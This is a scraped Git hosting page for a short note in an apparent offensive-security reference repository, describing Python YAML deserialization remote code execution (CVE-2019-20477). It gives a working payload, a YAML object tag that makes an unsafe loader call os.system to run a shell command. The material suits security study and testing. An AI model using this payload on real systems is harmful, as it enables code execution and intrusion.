This website requires JavaScript.
Explore
Help
Sign In
whx
/
killchain-compendium
Watch
1
Star
0
Fork
You've already forked killchain-compendium
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
d0c0ad1ab6
Branches
Tags
No results found.
killchain-compendium
/
Exploits
/
Web
/
YAML Deserialization.md
363 B
Raw
Blame
History
YAML Deserialization
CVE-2019-20477
RCE via Yaml execution by Python
jolt
Usage
Example Payload insid foo.yaml gets executed via Python
!!python/object/apply:os.system
[
"id"
]